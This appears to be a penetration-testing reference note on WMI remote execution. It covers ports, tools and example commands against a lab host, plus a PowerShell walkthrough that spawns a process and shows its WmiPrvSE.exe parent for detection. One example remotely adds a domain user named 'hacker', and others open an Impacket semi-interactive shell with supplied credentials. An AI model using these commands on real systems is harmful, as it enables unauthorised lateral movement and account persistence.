Backlink: reference-notes-readme


WMI is Microsoft's consolidation of system management under a single umbrella. It is used heavily under the hood for local operations, but it can also be used for remote execution. Several built-in tools exist for either WQL query execution or full code execution (the latter through the Create method of the Win32_Process class). Impacket includes wmiexec.py, which also provides a semi-interactive shell. Remote WMI uses RPC/DCOM as the communication bus: the client first talks to the endpoint mapper on 135/TCP and is then redirected to a dynamically allocated high port. Note for both sides of the fence: a process spawned through Win32_Process.Create runs as a child of WmiPrvSE.exe on the target, which is a common detection hook for WMI lateral movement.

Port: 135/TCP (RPC endpoint mapper), plus one dynamically allocated high TCP port (DCOM; by default in the 49152-65535 range on Vista/2008 and later, so firewall rules must allow that range or the dynamic range must be narrowed on the target)

Tools: wmic.exe, Get-WmiObject (PowerShell), pth-wmic (Linux), Impacket wmiexec.py

Examples

List Services:

wmic.exe /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 service get "startname,pathname"

Execute Code (Add User):

wmic /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 process call create "net user hacker Str0nGP_$sw0rd /add /domain"

List Services (via PS cmdlet):

Get-WMIObject -ComputerName 192.168.112.200 -query "Select * from Win32_Service"

List Processes (via Linux wmic util):

pth-wmic -U testlab/josh%Password1 //192.168.112.200 "select csname,name,processid,sessionid from win32_process"

Semi-interactive Shell (impacket):

wmiexec.py 'testlab/josh:Password1'@192.168.112.200
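Putting the two PowerShell-side pieces together (the WQL query from "List Services (via PS cmdlet)" and the Win32_Process.Create call behind "Execute Code"), here is an added example that is not part of the original note. It assumes the same lab target and account as the wmic examples (192.168.112.200, testlab\josh), passes credentials explicitly instead of relying on the current logon, checks the Create return code, and then queries the spawned process back to show that its parent is WmiPrvSE.exe.

```powershell
# Added example, not from the original note. Target and account are the
# lab placeholders used elsewhere on this page; the password is prompted for.
$Target = '192.168.112.200'
$Cred   = Get-Credential -UserName 'testlab\josh' -Message 'WMI credentials'

# 1. WQL query over DCOM: same data as the 'service get' wmic example, with
#    explicit credentials and a WHERE clause so only auto-start services come back.
$svc = Get-WmiObject -ComputerName $Target -Credential $Cred `
        -Query "SELECT Name, StartName, PathName FROM Win32_Service WHERE StartMode = 'Auto'"
$svc | Select-Object Name, StartName, PathName | Format-Table -AutoSize

# 2. Code execution via Win32_Process.Create. The method returns immediately:
#    ReturnValue 0 means a process was spawned (not that the command succeeded),
#    ProcessId is the new PID. A ping loop is used here so the process lives long
#    enough to be inspected in step 3.
$cmd = 'cmd.exe /c ping -n 20 127.0.0.1 > nul'
$res = Invoke-WmiMethod -ComputerName $Target -Credential $Cred `
        -Class Win32_Process -Name Create -ArgumentList $cmd
if ($res.ReturnValue -ne 0) {
    throw "Win32_Process.Create failed with ReturnValue $($res.ReturnValue)"
}
"Spawned PID $($res.ProcessId) on $Target"

# 3. Query the new process and its parent. Anything created this way hangs off
#    WmiPrvSE.exe, which is what a detection rule for WMI lateral movement keys on.
$proc   = Get-WmiObject -ComputerName $Target -Credential $Cred -Class Win32_Process `
            -Filter "ProcessId = $($res.ProcessId)"
$parent = Get-WmiObject -ComputerName $Target -Credential $Cred -Class Win32_Process `
            -Filter "ProcessId = $($proc.ParentProcessId)"
"{0} (PID {1}) parent: {2} (PID {3})" -f $proc.Name, $proc.ProcessId, $parent.Name, $parent.ProcessId
```

Get-WmiObject and Invoke-WmiMethod only exist in Windows PowerShell 5.1 and earlier; on PowerShell 7 the same calls are Get-CimInstance / Invoke-CimMethod, and to keep the traffic on DCOM (135/TCP plus the dynamic port) rather than WinRM, hand them a session built with New-CimSession -SessionOption (New-CimSessionOption -Protocol Dcom). Note that unlike wmiexec.py, this example never touches SMB: output of the spawned command is not retrieved, which is also why the return code alone cannot tell you whether the command did what you wanted.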